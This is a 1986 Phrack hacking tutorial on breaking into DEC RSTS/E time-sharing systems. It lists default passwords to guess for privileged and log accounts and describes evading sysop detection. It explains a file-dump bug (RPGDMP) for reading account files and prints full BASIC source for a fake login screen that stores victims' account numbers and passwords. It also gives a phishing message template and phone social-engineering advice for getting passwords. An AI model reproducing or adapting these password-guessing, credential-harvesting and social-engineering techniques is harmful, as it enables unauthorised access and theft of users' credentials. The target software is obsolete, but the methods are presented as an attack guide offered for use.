Title : Hacking RSTS Part 1
Author : The Seker
==Phrack Inc.==
Volume One, Issue 7, Phile 5 of 10
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$ $
$ PROGRAMMING RSTS/E $
$ File1: Passwords $
$ $
$ by: The Seker $
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$ Written (c) May 22, 1986 $
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
PREFACE:
--------
This document is first in a series of ongoing files about using the
RSTS/E operating system. All the files are based on version 8.0 as it is
almost fully compatible with the previous releases. If the need arises I have
made sure to note differences between V8.x and V9.x.
Credit goes to High Evolutionary for urging me to write these files; to
Night Stalker for sharing info; and to all other RSTS hackers that have
contributed in some way or another.
HISTORY:
--------
The RSTS/E (Resource System Time Sharing /Environment) operating system
was developed for the PDP/11 series of minicomputers created by DEC. (Digital
Equipment Corporation) It was developed with ease of use for the user (and
hacker) in mind. Because of this, there have been a lot of overlooked errors
leaving the system with quite weak security. In later versions, especially
the 9.x series password security has been greatly improved and is more secure,
but still has plenty of bugs for us to breach.
LOGGING ON:
-----------
Briefly.. locate a valid number and connect. Hit c/r (carriage return) a
few times or type:
HELLO
The system should identify itself displaying to you who owns it, what version
they're running under, the date, and the time. Then it will prompt for an
account number and a password.
Accounts are in a PPN (Project Program Number) format. This is actually
two numbers each between 0 and 254 separated by a comma or a slash. (eg. 3,45
or 27/248) Privileged accounts which you should hopefully be striving for all
start with a 1. So start hacking 1,x accounts.
Passwords are 1-6 characters long. They are only alphanumeric so you
don't have to worry about all that other shit being included. On V9.x systems
passwords may be up to 8 characters if the operator has changed the default
length. But this rarely ever happens as most ops are too lazy.
Common passwords are:
SYSLIB
SYSGEN
SYSCON
SYSMGR
SYSOPR
SYSTEM
OPRATR
RSTS
DECNET
GAMES
YYYYYY
XXXXXX
XYXYXY
DATA
RICH
XXX
AAA
Many of those have been rumored to be defaults. But actually I think the
true default (if there is one!) password is:
RSTSE
Also, accounts that have a password of:
??????
are only accessible by operators.
Remember to try names, cars, objects, the name of the company (in
different variations), etc. Cause most people generally pick passwords that
have some relation to their private life.. Take a little time and guess...
YOUR IN!
--------
Once you have succeeded in hacking out a valid password, whether it be
privileged or not, I suggest you find out who is logged onto the system. You
can do this simply by typing:
SY
This will tell you everyone logged on, what they are doing at the moment,
their job number, whether they are attached or detached, and a hell of a lot of
other crap. What you are looking for is someone else logged in under the same
account you are. If you find another user in the same account you hacked, log
off and call back later. This will prolong the life of your account and
prevent a rise in suspicion by the sysops. Remember, every system keeps a log
of what you do, and if two people are logged in under the same account many
times the sysops will delete or change the password to that account.
If everything checks out okay, you're free to do as you please. To list
the files in your allotted space type:
DIR
or to see all the files on the system type:
DIR (*,*)
NOTE: [ ] may be used in place of ( ) when dealing with files.
* acts as a wildcard on the RSTS system and can be used in place of
account numbers when searching for specific files. Speaking of searching for
files; to run a file type:
RUN filename.filetype
where filename = the file you wish to run, and filetype = the extension.
Experiment! Try what you will. If you ever need help just type:
HELP
Read the files contained within help. They are very detailed and I
guarantee can help you with what ever it is you need done.
One other thing, a few useful control characters are:
^C Breaks out of whatever your doing
^R Repeats last line typed
^X If ^C doesn't work, this may
^O Use to stop the flow of text without aborting the function in process
^T Tells status and runtime of terminal
^U Deletes line presently being typed in
^H Deletes characters
^S Transmission off
^Q Transmission on
GAINING PRIVILEGES:
-------------------
If you weren't able to hack out a privileged account don't panic. There
are still a few other ways for you to attain sysop status. These methods may
not always work, but they are worth a try.
]SYSTEM LOG[
On many RSTS/E systems before V9.0 there is one account dedicated to
keeping the system log; everything you and everyone else does. I have found
this account many times to be 1,101, 1,2, or 0,1 but you may want to do a
directory find to make sure. Type:
DIR (*,*)OPSER.LOG
or if nothing appears from that type:
DIR (*,*)SYSLOG.*
or
DIR (*,*)
Look for a file similar in name to that and mark down the account it
appears in. Now that you know which account the system log resides in logoff.
BYE
Then sign back on using the account in which the file was in. For
password try one of the following:
OPSER
OPSLOG
LOG
OPS
OOPS
OPRATR
SYSLOG
SYSTEM
These are common passwords to that account. If none of these work your
out of luck unless you can think of some other password that may be valid.
]SYSTEM BUGS[
When operating systems as complex as RSTS/E are created there will
undoubtedly be a few bugs in the operation or security. (Sometimes I am not
sure if these are intentional or not.) These can often be taken advantage of.
One that I know of is RPGDMP.TSK. To use this type:
RUN (1,2)RPGDMP
It will ask for a filename, and an output device. Give it any filename on
the system (I suggest $MONEY, $REACT, or $ACCT.SYS) and it will be dumped to
the specified device. (db1:, screen, etc).
Credit for this goes to The Marauder of LOD for finding, exposing and
sharing this bug with all.
If you find any other bugs similar to this, I would appreciate your
getting in touch with and letting me know.
GETTING PASSWORDS:
------------------
Now that you've hopefully gotten yourself priv's we can get on with these
files. Getting many passwords is a safety procedure, kind of like making a
backup copy of a program. There are a number of ways to get yourself
passwords, the easiest is by using privileges, but we will discuss that in a
later file. The methods I am going to explain are the decoy and a trick I like
to use, which I call the mail method.
]DECOY[
The decoy, commonly called a Trojan Horse, (which is something completely
different) is a program which emulates login.bac. When the unsuspecting user
enters his account and password you have your program store it into a file that
you can retrieve later. Here is a short program I've written that will preform
this task:
type NEW and it will prompt for a filename. Enter something not to obvious.
1 ! RSTSE Decoy
2 ! Written by The Seker (c) 1986 TOK!
5 extend
10 print:print
20 &"RSTS V8.0-07 TOK Communications Ltd. Job 7 <Dial-up> KB41
";date$(0);" ";time$(0)
30 print
40 &"User: ";
50 open "KB:" for input as file 1
60 on error goto 300
70 input 1,proj%,prog%
80 z$=sys(chr$(3%))
90 &"Password: ";
100 on error goto 300
110 input 1,pass$
120 print:z$=sys(chr$(2%))
130 close 1
140 open "SYSLIB.BAC" for output as file 2
150 print 2,proj%
160 print
2,prog%
170 print 2,pass$
180 close 2
200 print:print
210 off$=sys(chr$(14%)+"bye/f"+chr$(13))
300 if erl=70 then goto 350
310 if erl=110 then goto 360
350 &"Invalid entry - try again":z$=sys(chr$(2%)):try=try+1:if try=5 then goto
200 else resume 30
360 &"Invalid entry - try again":try=try+1:if try=5 then goto 200 else resume
90
999 end
The program as I said emulates login.bac, then logs the person off after a
few tries. Save this program. Then run it. When it starts, just drop the
carrier. The next person to call within 15 minutes will get your imitation
login.
If you are working on an older system like V7.0 change line 40 to read:
40 &" ";
NOTE: This will not work without modifications on releases after V8.7. An
improved and updated version of this program will be released as a small file
at a later date.
Next time you login and you want to recover the file type:
TYPE SYSLIB.BAC
It should print out the account and password. If you set this running
each time you plan on hanging up within a few days you'll have yourself a
handful of valid accounts.
]MAIL[
To run mail type:
RUN $MAIL
The mail method is probably used by many hackers and since I like to use
it, I thought I'd tell you what it was.
When you run the program the utility will tell you exactly how to use
itself. Assuming you know a little about it anyway we will get on with the
file. The object is to send mail to another user and try and convince him/her
you are the sysop and are writing him/her to validate their password. Don't
try this with a priv'd user! It would result in instant deletion.
Here's basically what you'd type:
Hello. We are contacting each of the users and validating their records to
keep our files up to date. If you would cooperate and leave me a response which
includes your full name, account number, and password we would appreciate your
help.
John Doe
System's Operator
4,11
As you can see the idea is to con a user into believing you are one of the
system ops. I would say this method works approximately 70% of the time on
most systems since users often times don't associate with sysops. Use a
different name if you try this though, as John Doe wouldn't fool anyone. (Be
creative) Also the 4,11 is the account you'd like them to leave the response
too.
You can try a few variations of this if you like. For example, if the
system you're hacking has a chat program:
RUN $TALK
You can just talk live time to them. Or if you somehow (like trashing) manage
to get a list of all the users and their phone numbers, you can call them up
and bullshit them.
NOTE: This document is intended for informational purposes only. The author
is in no way responsible for how it is used. Sysops are free to
display this at their will as long as no information within is altered
and all acknowledgements go to The Seker.